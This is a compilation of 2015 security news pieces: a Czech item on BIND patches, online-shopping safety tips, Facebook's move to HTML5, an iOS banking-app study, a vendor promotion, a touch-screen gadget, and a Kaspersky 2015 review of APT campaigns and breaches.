Nové verze BINDu záplatují tři nové zranitelnosti. Nejzávažnější z nich (CVE-2015–8000). může být zneužita ke spuštění DoS útoku proti serverům odpovídajícím na rekurzivní dotazy. Podle vyjádření odborníků z ISC může útočník pomocí záměrně špatně sestaveného atributu dotazu přinutit proces named k ukončení a tím způsobit výpadek služby. Riziko pro rekurzivní DNS servery je hodnoceno jako vysoké. Autoritativní servery mohou být také částečně postiženy, a to pokud provádějí autentifikaci při rekurzivních dotazech souvisejících s překladem adres serverů uvedených v NS RRSET. Zranitelnost je zneužitelná vzdáleně a byla klasifikována jako kritická, ačkoli ISC není známa existence aktivního exploitu této zranitelnosti.

Druhá z bezpečnostních děr opravených v nových verzích BINDu je sepnutí race condition při ošetření socket error. Tato zranitelnost může způsobit ukončení procesu named (CVE-2015–8461). Třetí opravenou chybou je zranitelnost OpenSSL (CVE-2015–3193).Přestože doposud nebylo publikováno významné zneužití žádné z těchto zranitelností, DNS servery jsou oblíbeným cílem několika typů útoku včetně DoS, únosu provozu a falšování odpovědí. Z tohoto důvodu by záplatování DNS serveru nemělo být bráno na lehkou váhu.

Top 8 Cyber Security Tips for Christmas Online Shopping
As the most wonderful time of the year has come - Christmas, it has brought with itself the time of online shopping.
According to National Retail Federation, more than 151 million people shopped in store, but more than 100 Million shopped online during Cyber Monday sales and even why wouldn't it be so given the vast conveniences of online shopping.
It is quite visible in these days that more and more people are heading towards online shopping rather than the malls to purchase gifts for Christmas.
However, the main question arises: Is it safe to do so? Especially with so many users sharing credit card information online.
Here are some tips that you have to keep in mind before providing your credit card number and clicking, 'BUY'
1. DO NOT CLICK On Suspicious Links
Malicious links are sent by scammers who look more real than the original ones. As these links are specifically of the well-known sites like eBay and Flipkart, many online users fall victim.
The safest way of not getting tricked by these would be NOT to open them if provided via social media sites, messages or emails from unknown sources.
2. Keep your Eye on New Vendors
People tend to purchase goods and services from new vendors as they generally give attractive discounts.
However, one should always be safe from such vendors as sometimes the customer is trapped and exploited easily.
One of the main problems is FAKE CUSTOMERS REVIEW. Never rely totally on company or seller review information.
Always get a double confirmation of the things that are necessary including product purpose and suitability, materials and construction, quality, and other things like speedy shipping, prompt refunds, and returns.
Always try to start from minimum purchases and then shift to the major ones.
Always look before you leap.
Search online for other people's experiences online and also some sites like and others.
3. Always Use Strong Passwords
This tip is one of the most obvious ones, but people do not intend to use it generally.
Always try to avoid easy to crack passwords by including a combination of upper and lowercase letters, numbers and special characters in your password.
Avoid using the most common passwords like your name, 123456 and password.
Most importantly don't use the same password for multiple sites.
4. Always Use Secured Websites
Before typing your sensitive information online, check to make sure if the website you just visited is a secure site.
Secure sites have a closed padlock in the status bar, and its URL starts with HTTPS, which means:
Communication is encrypted
SSL verifies authenticity
5. Avoid Using Debit Cards, Instead Use Credit Cards
For online shopping purposes, using a credit card is always considered to be a comparatively better option rather than using a debit card.
In a case, if someone manages to intercept your financial information online, they can do less damage.
Credit cards have spending limits but debit cards do not
Credit cards should also be used with low credit limits even as other option also given by the bank as "one-time use."
You can even make use of virtual credit cards that are specifically designed for online shopping only.
6. Important Things to Remember While Shopping
Always keep documentation of your online purchases, mostly an email is sent to the customer confirming the order.
It is the duty of every customer to print the document or save it somewhere safe till receiving the order.
Moreover, it is always suggested to log off from the retailer's website after making the purchase.
These are always considered to be the smarter options to adapt than to become a victim.
7. Do Not Provide Your Details to Every Website You Visit
Online stores provide an option for the customers to check out as a one time customer.
If you are not shopping regularly from any site, avoid filling unnecessary information, just in case, to be safe.
8. Check Your Bank Statements Regularly
Most of the banks now allow for setting up email notifications of any credit card transaction.
If you see any charges that are unusual, they have to get reported, and suitable actions should be taken that are needed to get a prompt refund.

Facebook wins Flash by knock out by switching to HTML5!

Step by step the HTML5 language is replacing the flawed Flash that hackers have exploited in an impressive number of cyber attacks in the wild.
It may help the fact that Facebook is leaving Flash behind and it is adopting HTML5 (YouTube has done in the a recent past).

“We recently switched to HTML5 from a Flash-based video player for all Facebook web video surfaces, including videos in News Feed, on Pages, and in the Facebook embedded video player. We are continuing to work together with Adobe to deliver a reliable and secure Flash experience for games on our platform, but have shipped the change for video to all browsers by default.” States the announcement issued by Facebook.

“From development velocity to accessibility features, HTML5 offers a lot of benefits. Moving to HTML5 best enables us to continue to innovate quickly and at scale, given Facebook’s large size and complex needs.”

We are big supporters of the HTML5 since it eliminates the weakest link in the user environment and in terms of development, it makes the job easier for developers.

Facebook HTML5

Facebook explains the benefits of HTML5 that they will be using:

Development velocity

“Using web technologies allows us to tap into the excellent tooling that exists in browsers, among the open source community, and at Facebook in general. Not having to recompile code and being able to apply changes directly in the browser allow us to move fast.”


“We have an excellent testing infrastructure at Facebook. By moving to HTML5 video, we can avail ourselves of all the web tools in that infrastructure, like jest and WebDriver, at our disposal.”


“HTML5 made it possible for us to build a player that is fully accessible to screen readers and keyboard input. We can leverage the accessibility tools that HTML5 provides to make it easier for people with visual impairments to use our products. Making Facebook accessible to everyone is an important part of our mission to make the world more open and connected.”

When doing such a big move, there are challenges that needs to be overcome, and Facebook is no exception, and for that reason Facebook needed to:

Getting logging right

“To ensure logging correctness, we created a test suite that performs the same user-interaction scenarios against both video players and then validates that the logs are equivalent. This way we had high confidence in the data that our new HTML5 video player reports.”

Browser bugs

“One of the major issues we wanted to solve before shipping the HTML5 player was the number of bugs in various browsers around HTML5 videos. One specific bug in Chrome’s implementation of the SPDY protocol caused the browser to simply stop loading and playing videos in News Feed. We determined that the issue was triggered by loading too many videos concurrently, so we reduced the number of videos we load at the same time and make sure we cancel loading videos as soon as they are no longer required.”

Worse performance in older browsers

“In theory, most browsers in use support HTML5 video. However, in practice we noticed that a lot of the older browsers would simply perform worse using the HTML5 player than they had with the old Flash player. We saw more errors, longer loading times, and a generally worse experience. We decided to initially launch the HTML5 player to only a small set of browsers, and continuously roll out to more browsers, versions, and operating systems as we improved it and fixed small bugs. That’s why we waited until recently to ship the HTML5 player to all browsers by default, with the exception of a small set of them.”

Page load time regression

“The last major issue we faced while launching the HTML5 player was a regression in the time it takes to load Facebook. At Facebook, we care about the experience we provide to people. How long Facebook takes to load is a contributing factor we look at to gauge user experience. When we shipped the HTML5 player, we noticed that on average it took slightly longer for Facebook to load. By fixing several small performance regressions and making multiple micro-optimizations, we finally reached a level we felt happy with shipping.”

As said before, this can be a huge improvement for the user but also for the developers. On the user side, they will have an improved video experience, videos will start playing faster which is good.

It is good that big companies like Facebook and Google are adopting HTML5 forcing sooner or later other websites to switch to HTML5, making everyone a bit safer.

iOS Mobile Banking Apps, what is changed from 2013 tests?

The security expert Ariel Sanchez presented the results of the test conducted on 40 iOS banking apps, comparing them to the ones obtained 2 years ago.
The banking industry is looking with an increasing interest in mobile platform, financial institutes are offering a growing number of services accessible through mobile devices, but what about security?

The security of mobile banking apps has been improved over the last years, but there is still a great scope for improvement.

Ariel Sanchez, a security consultant for IOActive, two years ago conducted a research on security implemented by iOS banking apps and now has decided to repeat the same tests. Sanchez evaluated the security level for 40 iOS banking apps and discovered a number of security weaknesses or vulnerabilities. The expert limited his analysis on client-side, avoiding to investigate the security offered on server-side.

For obvious reason, Sanchez hasn’t revealed the name of the apps or the banks who developed the mobile apps it tested.

What is changed?

Revisiting its research, Sanchez discovered that many of the problems emerged two years ago still remain despite the overall level of security is increased. Sanchez executed the following tests on each app:

Transport Security
Plaintext traffic
Improper session handling
Properly validate SSL certificates
Compiler Protection
Anti-jailbreak protection
Compiled with PIE
Compiled with stack cookies
Automatic reference counting
Data validation (input, output)
UIWebView implementations
Insecure Data Storage
SQLlite database
File caching
Property list files
Log files
Custom logs
NSLog statements
Crash reports files
Binary Analysis
Disassemble the application
Detect obfuscation of the assembly code protections
Detect anti-tampering protections
Detect anti-debugging protections
Protocol handlers
Client-side injection
Third-party libraries
He discovered that five apps (12,5 per cent) failed to validate the authenticity of the SSL certificates presented, a circumstance that opens mobile users to Man-in-The-Middle (MiTM) attacks.

35 per cent of the mobile apps contained non-SSL links throughout the application, traffic to these links could be easily intercepted by attackers that could also inject arbitrary JavaScript/HTML code in an attempt to create a fake login prompt.

30 per cent of the iOS apps failed to validate incoming data, a circumstance that allows an attacker to potentially inject JavaScript. The expert noticed that this percentage is reduced respect the previous tests conducted in 2013.

40% of the apps leak information about user activity or client-server interactions.

“35% of the apps contained non-SSL links throughout the application. This allows an attacker to intercept traffic and inject arbitrary JavaScript/HTML code in an attempt to create a fake login prompts or similar scams. ” states the post published by Sanchez.

The expert also analyzed binary and file system revealing that 15 per cent of the iOS banking apps store unencrypted data and sensitive information. In some cases customers’ banking accounts and transaction history are archived in sqlite databases on the device or in plain text files.

In the following graphs are reported the results of the test conducted in 2013 and 2015.

iOS banking apps security test 2013 vs 2015

iOS banking apps security test 2013 vs 2015 2

Most of the apps have improved traffic protection and are properly validating SSL certificates, drastically reducing the exposure to MiTM attacks. It is interesting to note that there are still a high number of apps storing insecure data in their file system.

Sanchez concluded that despite the security implemented by the banking apps is increased it is still not enough because many apps remain vulnerable.

“While overall security has increased over the two-year period, it is not enough, and many apps remain vulnerable.” he added.

Enjoy the “(In)secure iOS Mobile Banking Apps – 2015 Edition” report.

AlienVault Unified Security Management: Real-Time Threat Detection Starting on Day 1
As organizations expand their IT infrastructure to match their evolving business models and meet changing regulatory requirements, they often find that their networks have become extremely complex and challenging to manage.
A primary concern for many IT teams is detecting threats in the mountain of event data being generated every day.
Even a relatively small network can generate hundreds or thousands of events per second, with every system, application, and service generating events.
The sheer volume of data makes it virtually impossible to identify manually and link those few events that indicate a successful network breach and system compromise, before the exfiltration of data.
The AlienVault Unified Security Management (USM) platform is a solution to help IT teams with limited resources overcome the challenge of detecting threats in their network.
USM platform accelerates and simplifies your ability to detect, prioritize, and respond to the most critical threats targeting your network.
It enables any IT or security practitioner to see actionable results on day one and begin to improve their security posture immediately.
What can you do with USM?
All of USM’s built-in security controls are pre-integrated and optimized to work together out of the box. This unified approach eliminates the need for IT teams to configure and maintain numerous security point products.
Within minutes of installing USM, the platform begins generating detailed alerts. Additionally, it provides valuable insights into the assets and threats on your network with the following technologies:
Asset discovery
Vulnerability assessment
Intrusion detection
Behavioral monitoring
Security information and event management (SIEM)
Integrated threat intelligence from AlienVault Labs
This insight provides visibility into the software installed on your devices, their configuration, any vulnerabilities, as well as the specific threats targeting them.
Armed with this detailed threat information, you can focus on responding to the threats instead of trying to collect and analyze the information manually.
Integrated Threat Intelligence
The integrated threat intelligence, powered by AlienVault Labs and the , includes continuous updates to the built-in security controls as well as the latest information on emerging threats and bad actors.
The AlienVault Labs threat research team spends countless hours mapping out the different types of cyber attacks, the most recent threats, suspicious behavior, vulnerabilities and exploits they uncover across the entire threat landscape.
The team regularly delivers threat intelligence as a coordinated set of updates to the USM platform, which accelerates and simplifies threat detection and remediation.
OTX is the world’s first truly open threat intelligence community that enables collective defense with actionable, community-powered threat data.
It alerts you whenever an indicator of compromise (IOC) related to a new or emerging threat documented in the OTX database is detected in their network.
OTX enables everyone in the OTX community to collaborate actively and strengthen their defenses while helping others do the same.
Integrate Data from Existing Security Tools
The USM platform’s open architecture also enables you to utilize a much wider range of network and security data if you wish.
You can integrate security events from 3rd party tools, utilizing the extensive plugin library, or create custom plugins for unique applications running on your network.
Simplify Regulatory Compliance Requirements
AlienVault USM automatically identifies significant audit events that warrant immediate action. From file integrity monitoring to IDS to log management, USM makes compliance easier.
Not only does it provide the , but USM also gathers the information and generates the reports to give to auditors.
Additionally, USM includes a report library that provides flexible reporting and executive dashboards that make compliance measurement, reporting, and audits less painful.
USM allows you to demonstrate to auditors and management that your incident response program is robust and reliable for a range of regulations and guidelines, including PCI DSS, HIPAA, ISO 27002, SOX, GPG13 and more.
Deployment flexibility
The USM platform is also designed to meet a wide range of deployment requirements.
All of the AlienVault USM products are available in various models and form factors, based on size, scale, and configuration requirements.
You can quickly deploy AlienVault USM – as a dedicated hardware appliance, a virtual appliance, or as a cloud appliance within the Amazon AWS environment.
For one location, you can deploy a single USM All-in-One tool. The All-in-One appliance consolidates all USM functions into a single hardware or virtual appliance for reduced complexity and rapid deployment.
All event logs are forwarded to a single USM All-in-One appliance for collection, aggregation, analysis, correlation and reporting.
For larger networks, multiple locations, or locations with a high volume of events and/or performance requirements, you will want to deploy separate USM Standard or Enterprise components, either hardware or virtual appliances, to benefit from the improved performance.
Server – Aggregates and correlates information gathered by the Sensors, and provides single-pane-of-glass management, reporting, and administration.
Logger – Securely archives raw event log data for forensic investigations and compliance mandates.
Sensor – Deploys throughout the network to collect logs to provide the five essential security capabilities you need for complete visibility.
There is also a version of AlienVault USM or AWS that is built for the Amazon “shared responsibility” security model.
The AWS-native USM for AWS maximizes visibility into potential threats and misconfigurations and makes it easy to use built-in AWS security features like CloudTrail and Security Groups.
Try it for free
With USM you can achieve true security visibility in minutes, not months - If you'd like to take a closer look at AlienVault USM, you can , or you can on the AlienVault website.

How to Turn Any Non-Touch Screen PC Into a Touch Screen
How to Turn Any Non-Touch Screen PC Into a Touch Screen
Want to buy a touch-screen laptop but couldn't afford it?
But what if I told you that you can turn your existing non-touch-screen laptop into a Touch Screen laptop?
Yes, it's possible. You can now convert your laptop or PC into a touch screen with the help of a new device called AirBar.
Touch screen has become a popular feature on laptops these days, and many laptops are moving toward having touch screens, but not every laptop or desktop model comes with the feature.
Swedish company Neonode has brought to you a new device, AirBar, that would bring the touch technology to virtually any computer from your non-touch laptops to notebooks.
What is AirBar and How does it Work?
AirBar is a small plug-and-touch bar that attaches magnetically to the bottom of your machine's display.
When connected to your laptop via an available USB port, AirBar starts emitting a beam of invisible light across your screen that is used to track touchscreen movements and gestures.
The movements and gestures are then translated into corresponding inputs, making you able to use all the gestures including poking, pinching, swiping, zooming and scrolling around with your hand, in the same way, like on a touchscreen PC.
Video Demonstration
AirBar turns any laptop, computer, or notebook into a touchscreen machine, without making any changes to its hardware.
You can watch the video below to know how really AirBar works.

And What's Great about AirBar is that…
…it even works if you have worn gloves, and with any other object.
AirBar works well with any device running Windows 8 or Windows 10 or even with a Chromebook, but it still needs to have proper OS X support.
The AirBar is going to retail for $49 next month with its public launch in January 2016 at the CES event in Las Vegas. 15.6-inch screens size at present. Currently, the only size that AirBar accommodates is 15.6-inch screens.

Kaspersky Security Bulletin 2015. Top security stories
19.12.2015 Zdroj: Kaspersky

PDF  PDF Complet

Top security stories
Overall statistics for 2015
Evolution of cyber threats in the corporate sector
Predictions 2016
Targeted attacks and malware campaigns

Targeted attacks are now an established part of the threat landscape, so it’s no surprise to see such attacks feature in our yearly review. Last year, in our security forecast, we outlined what we saw as the likely future APT developments.

The merger of cybercrime and APT
Fragmentation of bigger APT groups
Evolving malware techniques
New methods of data exfiltration
APT arms race
Here are the major APT campaigns that we reported this year.

Carbanak combined cybercrime – in this case, stealing money from financial institutions – with the infiltration techniques typical of a targeted attack. The campaign was uncovered in spring 2015: Kaspersky Lab was invited to conduct a forensic investigation of a bank’s systems after some of its ATMs started to dispense cash ‘randomly’. It turned out that the bank was infected. Carbanak is a backdoor designed to carry out espionage, data exfiltration and remote control of infected computers. The attackers used APT-style methods to compromise their victims – sending spear-phishing e-mails to bank employees. Once installed on a bank’s computer, the attackers carried out reconnaissance to identify systems related to processing, accounting and ATMs and simply mimicked the activities of legitimate employees. Carbanak used three methods to steal money: (1) dispensing cash from ATMs, (2) transferring money to cybercriminals using the SWIFT network and (3) creating fake accounts and using mule services to collect the money. The attackers targeted around 100 financial institutions, with total losses amounting to almost $1 billion.

Kaspersky Security Bulletin 2015. Top security stories

One of most talked-about news stories of Q1 2015 surrounded the Equation cyber-espionage group. The attackers behind Equation successfully infected the computers of thousands of victims in Iran, Russia, Syria, Afghanistan, the United States and elsewhere – victims included government and diplomatic institutions, telecommunications companies and energy firms. This is one of the most sophisticated APT campaigns we’ve seen: one of the many modules developed by the group modifies the firmware of hard drives – providing a level of stealth and persistence beyond other targeted attacks. It’s clear that development of the code stretches back to 2001 or earlier. It’s also related to other notorious attacks, Stuxnet and Flame – for example, its arsenal included two zero-day vulnerabilities that were later to be used in Stuxnet.

While investigating an incident in the Middle East, we uncovered the activity of a previously unknown group conducting targeted attacks. Desert Falcons is the first Arabic-speaking group that has been seen conducting full-scale cyber-espionage operations – apparently connected with the political situation in the region. The first signs of this campaign date back to 2011. The first infections took place in 2013, although the peak of activity was in late 2014 and early 2015. The group has stolen over 1 million files from more than 3,000 victims. The victims include political activists and leaders, government and military organizations, mass media and financial institutions – located primarily in Palestine, Egypt, Israel and Jordan. It’s clear that members of the Desert Falcons group aren’t beginners: they developed Windows and Android malware from scratch, and skillfully organized attacks that relied on phishing e-mails, fake web sites and fake social network accounts.

#Carbanak combined stealing from financial institutions with techniques typical of a targeted attack #KLReport
In March 2015, we published our report on the Animal Farm APT, although information on the tools used in this campaign started appearing in the previous year. In March 2014, the French newspaper, Le Monde, published an article on a cyber-espionage toolset that had been identified by Communications Security Establishment Canada (CSEC): this toolset had been used in the ‘Snowglobe’ operation that targeted French-speaking media in Canada, as well as Greece, France, Norway and some African countries. CSEC believed that the operation might have been initiated by French intelligence agencies. A year later, security researchers published analyses (here, here and here) of malicious programs that had much in common with ‘Snowglobe’: in particular, the research included samples with the internal name ‘Babar’ – the name of the program mentioned by CSEC. Following analysis of the malicious programs, and the connections between them, Kaspersky Lab named the group behind the attacks as Animal Farm. The group’s arsenal included two of the three zero-day vulnerabilities that we had found in 2014 and that had been used by cybercriminals: for example, an attack from the compromised web site of the Syrian Ministry of Justice using CVE-2014-0515 exploits led to the download of an Animal Farm tool called ‘Casper’. One curious feature of this campaign is that one of its programs, ‘NBOT’, is designed to conduct DDoS (Distributed Denial of Service) attacks. This is rare for APT groups. One of the malicious ‘animals’ in the farm has the strange name ‘Tafacalou’ – possibly an Occitan word (a language spoken in France and some other places).

In April 2015, we reported the appearance of a new member of a growing ‘Duke’ family that already includes MiniDuke, CosmicDuke and OnionDuke. The CozyDuke APT (also known as ‘CozyBear’, ‘CozyCat’ and ‘Office Monkeys’) targets government organisations and businesses in the United States, Germany, South Korea and Uzbekistan. The attack implements a number of sophisticated techniques, including the use of encryption, anti-detection capabilities and a well-developed set of components that are structurally similar to earlier threats within the ‘Duke’ family. However, one of its most notable features is its use of social engineering. Some of the attackers’ spear-phishing e-mails contain a link to hacked web sites – including high-profile, legitimate sites – that host a ZIP archive. This archive contains a RAR SFX that installs the malware while showing an empty PDF as a decoy. Another approach is to send out fake flash videos as e-mail attachments. A notable example (one that gives the malware one of its names) is ‘OfficeMonkeys LOL’. When run, this drops a CozyDuke executable on to the computer, while playing a ‘fun’ decoy video showing monkeys working in an office. This encourages victims to pass the video around the office, increasing the number of compromised computers. The successful use of social engineering to trick staff into doing something that jeopardises corporate security – by CozyDuke and so many other targeted attackers – underlines the need to make staff education a core component of any business security strategy.

The Naikon APT focused on sensitive targets in south-eastern Asia and around the South China Sea. The attackers, who seem to be Chinese-speaking and have been active for at least five years, target top-level government agencies and civil and military organisations in the Philippines, Malaysia, Cambodia, Indonesia, Vietnam, Myanmar, Singapore, Nepal, Thailand, Laos and China. Like so many targeted attack campaigns, Naikon makes extensive use of social engineering to trick employees of target organizations into installing the malware. The main module is a remote administration tool that supports 48 commands designed to exercise control over infected computers: these include commands to take a complete inventory, download and upload data, install add-on modules and the use of keyloggers to obtain employees’ credentials. The attackers assigned an operator to each target country, able to take advantage of local cultural features – for example, the tendency to use personal e-mail accounts for work. They also made use of a specific proxy server within a country’s borders, to manage connections to infected computers and transfer of data to the attackers’ Command-and-Control (C2) servers. You can find our main report and follow-up report on our web site

One of the many modules developed by the #Equation group modifies the firmware of hard drives #KLReport
While researching Naikon, we also uncovered the activities of the Hellsing APT group. This group focused mainly on government and diplomatic organisations in Asia: most victims are located in Malaysia and the Philippines, although we have also seen victims in India, Indonesia and the US. In itself, Hellsing is a small and technically unremarkable cyber-espionage group (around 20 organisations have been targeted by Hellsing). What makes it interesting is that the group found itself on the receiving end of a spear-phishing attack by the Naikon APT group – and decided to strike back! The target of the e-mail questioned the authenticity of the e-mail with the sender. They subsequently received a response from the attacker, but didn’t open the attachment. Instead, shortly afterwards they sent an e-mail back to the attackers that contained their own malware. It’s clear that, having detected that they were being targeted, the Hellsing group was intent on identifying the attackers and gathering intelligence on their activities. In the past, we’ve seen APT groups accidentally treading on each other’s toes – for example, stealing address books from victims and then mass-mailing everyone on each of the lists. But an ATP-on-APT attack is unusual

Kaspersky Security Bulletin 2015. Top security stories

Many targeted attack campaigns focus on large enterprises, government agencies and other high-profile organisations. So it’s easy to read the headlines and imagine that such organisations are the only ones on the radar of those behind targeted attacks. However, one of the campaigns we reported last quarter showed clearly that it’s not only ‘big fish’ that attackers are interested in. The Grabit cyber-espionage campaign is designed to steal data from small- and medium-sized organisations – mainly based in Thailand, Vietnam and India, although we have also seen victims in the US, UAE, Turkey, Russia, China, Germany and elsewhere. The targeted sectors include chemicals, nanotechnology, education, agriculture, media and construction. We estimate that the group behind the attacks has been able to steal around 10,000 files. There’s no question that every business is a potential target – for its own assets, or as a way of infiltrating another organisation

In spring 2015, during a security sweep, Kaspersky Lab detected a cyber-intrusion affecting several internal systems. The full-scale investigation that followed uncovered the development of a new malware platform from one of the most skilled, mysterious and powerful groups in the APT world – Duqu, sometimes referred to as the step-brother of Stuxnet. We named this new platform ‘Duqu 2.0’. In the case of Kaspersky Lab, the attack took advantage of a zero-day vulnerability in the Windows kernel (patched by Microsoft on 9 June 2015) and possibly up to two others (now patched) that were also zero-day vulnerabilities at the time. The main goal of the attackers was to spy on Kaspersky Lab technologies, ongoing research and internal processes. However, Kaspersky Lab was not the only target. Some Duqu 2.0 infections were linked to the P5+1 events related to negotiations with Iran about a nuclear deal: the attackers appear to have launched attacks at the venues for some of these high-level talks. In addition, the group launched a similar attack related to the 70th anniversary event of the liberation of Auschwitz-Birkenau. One of the most notable features of Duqu 2.0 was its lack of persistence, leaving almost no traces in the system. The malware made no changes to the disk or system settings: the malware platform was designed in such a way that it survives almost exclusively in the memory of infected systems. This suggests that the attackers were confident that they could maintain their presence in the system even if an individual victim’s computer was re-booted and the malware was cleared from memory. The Duqu 2.0 technical paper and analysis of the persistence module can be found on our web site

In August, we reported on the Blue Termite APT, a targeted attack campaign focused on stealing information from organisations in Japan. These include government agencies, local government bodies, public interest groups, universities, banks, financial services, energy, communication, heavy industry, chemical, automotive, electrical, news media, information services sector, health care, real estate, food, semiconductor, robotics, construction, insurance, transportation and more. One of the most high profile targets was the Japan Pension Service. The malware is customized according to the specific victim. The Blue Termite backdoor stores data about itself – including C2, API name, strings for anti-analysis, values of mutexes, as well as the MD5 checksum of backdoor commands and the internal proxy information. The data is stored in encrypted form, making analysis of the malware more difficult – a unique decryption key is required for each sample. The main method of infection, as with so many targeted attack campaigns, is via spear-phishing e-mails. However, we have other methods of infection. These include drive-by downloads using a Flash exploit (CVE-2015-5119) – one of the exploits leaked following the Hacking Team security breach – several Japanese web sites were compromised this way. We also found some watering-hole attacks, including one on a web site belonging to a prominent member of the Japanese government

#Hellsing group found itself on the receiving end of a spear-phishing attack by #Naikon & strike back #KLReport
The group behind the Turla cyber-espionage campaign has been active for more than eight years now (our initial report, follow-up analysis and campaign overview can be found on, infecting hundreds of computers in more than 45 countries. The attackers profile their victims using watering-hole attacks in the initial stages. However, as outlined in our latest report, for subsequent operations the group makes use of satellite communications to manage its C2 traffic. The method used by Turla to hijack downstream satellite links does not require a valid satellite Internet subscription. The key benefit is that it’s anonymous – it’s very hard to identify the attackers. The satellite receivers can be located anywhere within the area covered by the satellite (typically a wide area) and the true location and hardware of the C2 server can’t be identified easily or physically seized. It’s also cheaper than purchasing a satellite-based link and easier than hijacking traffic between the victim and the satellite operator and injecting packets along the way. The Turla group tends to focus on satellite Internet providers located in the Middle East and Africa, including Congo, Lebanon, Libya, Niger, Nigeria, Somalia and the UAE. Satellite broadcasts from these countries don’t normally cover European and North American countries, making it very hard for security researchers to investigate such attacks. The use of satellite-based Internet links is an interesting development. The hijacking of downstream bandwidth is cheap (around $1,000 for the initial investment and around $1,000 per year in maintenance), easy to do and offers a high degree of anonymity. On the other hand, it is not always as reliable as more traditional methods (bullet-proof hosting, multiple proxy levels and hacked web sites) – all of which Turla also uses. This makes it less likely that it will be used to maintain extensive botnets. Nevertheless, if this method becomes widespread among APT groups or cybercriminals, it will pose a serious problem for the IT security industry and law enforcement agencies

Kaspersky Security Bulletin 2015. Top security stories

In August 2015, we published an update on the Darkhotel APT. These attacks were originally characterised by the misuse of stolen certificates, the deployment of HTA files using multiple methods and the infiltration of hotel Wi-Fi to place backdoors on targets’ computers

The #Turla group makes use of satellite communications to manage its C2 traffic #KLReport
While the attackers behind this APT continue to use these methods, they have supplemented their armoury, shifting their attention more towards spear-phishing of their chosen victims. As well as using HTA files, they are also deploying infected RAR files, using the RTLO (right to left override) mechanism to mask the real extension of the file. The attackers also use Flash exploits, including a zero-day exploit leaked as a result of the Hacking Team security breach. The group has also extended its geographic reach to include victims in North Korea, Russia, South Korea, Japan, Bangladesh, Thailand, India, Mozambique and Germany

Data breaches

There has been a steady stream of security breaches this year. That such incidents have become routine is hardly surprising: personal information is a valuable commodity – not just for legitimate companies, but for cybercriminals too. Among the biggest incidents this year were attacks on Anthem, LastPass, Hacking Team, the United States Office of Personnel Management, Ashley Madison, Carphone Warehouse, Experian and TalkTalk. Some of these attacks resulted in the theft of huge amounts of data, highlighting the fact that many companies are failing to take adequate steps to defend themselves. It’s not simply a matter of defending the corporate perimeter. There’s no such thing as 100 per cent security, so it’s not possible to guarantee that systems can’t be breached, especially where someone on the inside is tricked into doing something that jeopardises corporate security. But any organisation that holds personal data has a duty of care to secure it effectively. This includes hashing and salting customer passwords and encrypting other sensitive data

On the other hand, consumers can limit the damage of a security breach at an online provider by ensuring that they choose passwords that are unique and complex: an ideal password is at least 15 characters long and consists of a mixture of letters, numbers and symbols from the entire keyboard. As an alternative, people can use a password manager application to handle all this for them automatically.

The issue of passwords is one that keeps surfacing. If we choose a password that is too easy to guess, we leave ourselves wide open to identify theft. The problem is compounded if we recycle the same password across multiple online accounts – if one accounts is compromised, they’re all at risk! This is why many providers, including Apple, Google and Microsoft, now offer two-factor authentication – i.e. requiring customers to enter a code generated by a hardware token, or one sent to a mobile device, in order to access a site, or at least in order to make changes to account settings. Two-factor authentication certainly enhances security – but only if it’s required, rather than just being an option

In 2015, there has been a steady stream of security breaches #KLReport
The theft of personal data can have serious consequences for those affected. However, sometimes there can be serious knock-on effects. The Hacking Team breach resulted in the publication of 400GB of data: this included exploits used by the Italian company in its surveillance software. Some of the exploits were used in APT attacks – Darkhotel and Blue Termite. Unsurprisingly, the breach was followed by a scramble to patch the vulnerabilities exposed by the attackers

Smart (but not necessarily secure) devices

The Internet is woven into the fabric of our lives – literally in the case of the growing number of everyday objects used in the modern home – smart TVs, smart meters, baby monitors, kettles and more. You may remember that last year one of our security researchers investigated his own home, to determine whether it was really cyber-secure. You can find a follow-up to this research here. However, the ‘Internet of Things’ encompasses more than household devices.

Researchers have been investigating the potential security risks associated with connected cars for some years. In July 2014 Kaspersky Lab and IAB published a study looking at the potential problem areas of connected cars. Until this year, the focus was on accessing the car’s systems by means of a physical connection to the vehicle. This changed when researchers Charlie Miller and Chris Valasek found a way to gain wireless access to the critical systems of a Jeep Cherokee – successfully taking control and driving it off the road! (You can read the story here)

This story underlines some of the problems with connected devices that extend beyond the car industry – to any connected device. Unfortunately, security features are hard to sell; and in a competitive marketplace, things that make customers’ lives easier tend to take precedence. In addition, connectivity is often added to a pre-existing communication network that wasn’t created with security in mind. Finally, history shows that security tends to be retro-fitted only after something bad happens to demonstrate the impact of a security weakness. You can read more on these issues in a blog post written by Eugene Kaspersky published in the aftermath of the above research

Some of the problems with connected devices apply also to ‘smart cities’ #KLReport
Such problems apply also to ‘smart cities‘. For example, the use of CCTV systems by governments and law enforcement agencies to monitor public places has grown enormously in recent years. Many CCTV cameras are connected wirelessly to the Internet, enabling police to monitor them remotely. However, they are not necessarily secure: there’s the potential for cybercriminals to passively monitor security camera feeds, to inject code into the network – thereby replacing a camera feed with fake footage – or to take systems offline. Two security researchers (Vasilios Hioureas from Kaspersky Lab and Thomas Kinsey from Exigent Systems) recently conducted research into the potential security weaknesses in CCTV systems in one city. You can read Vasilios’s report on our web site)

Unfortunately, there had been no attempt to mask the cameras, so it was easy to determine the makes and models of the cameras being used, examine at the relevant specifications and create their own scaled model in the lab. The equipment being used provided effective security controls, but these controls were not being implemented. Data packets passing across the mesh network were not being encrypted, so an attacker would be able to create their own version of the software and manipulate data travelling across it. One way this could potentially be used by attackers would be to spoof footage sent to a police station, making it appear as if there is an incident in one location, thereby distracting police from a real attack occurring somewhere else in the city

The researchers reported the issues to those in charge of the real world city surveillance system and they are in the process of fixing the security problems. In general, it’s important that WPA encryption, protected by a strong password, is implemented in such networks; that labelling is removed from hardware, to make it harder for would-be attackers to find out how the equipment operates; and to encrypt footage as it travels through the network

The wider issue here is that more and more aspects of everyday life are being made digital: if security isn’t considered at the design stage, the potential dangers could be far-reaching – and retro-fitting security might not be straightforward. The Securing Smart Cities initiative, supported by Kaspersky Lab, is designed to help those responsible for developing smart cities to do so with cyber-security in mind

International co-operation against cybercriminals

Cybercrime is now an established part of life, on the back of the ever-increasing online activities we engage in. This is now being reflected in official statistics. In the UK, for example, the Office for National Statistics now includes cybercrime among its estimates of the scale of crime, reflecting the fact that nature of crime in society is changing. While there’s no question that cybercrime can be lucrative, cybercriminals aren’t always able to act with impunity; and the actions of law enforcement agencies around the world can have a significant impact. International co-operation is particularly important, given the global nature of cybercrime. This year there have been some notable police operations

